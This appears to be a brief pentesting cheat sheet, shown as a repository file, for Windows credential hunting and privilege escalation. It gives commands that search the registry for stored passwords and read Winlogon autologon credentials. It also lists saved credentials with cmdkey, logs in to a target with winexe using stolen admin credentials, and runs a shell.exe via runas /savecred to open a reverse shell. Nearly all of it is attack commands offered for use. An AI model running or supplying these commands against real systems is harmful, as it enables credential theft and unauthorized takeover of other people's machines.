458 B

Raw Blame History

Password Inside Registry Key

Query passwords saved inside the registry

reg query HKLM /f password /t REG_SZ /s

Admin Autologon credentials

reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"

On attacker, change the credentials on target

winexe -U 'admin%password' //<target-IP> cmd.exe

List other Creds

cmdkey /list

Open reverse shell

runas /savecred /user:admin C:\shell.exe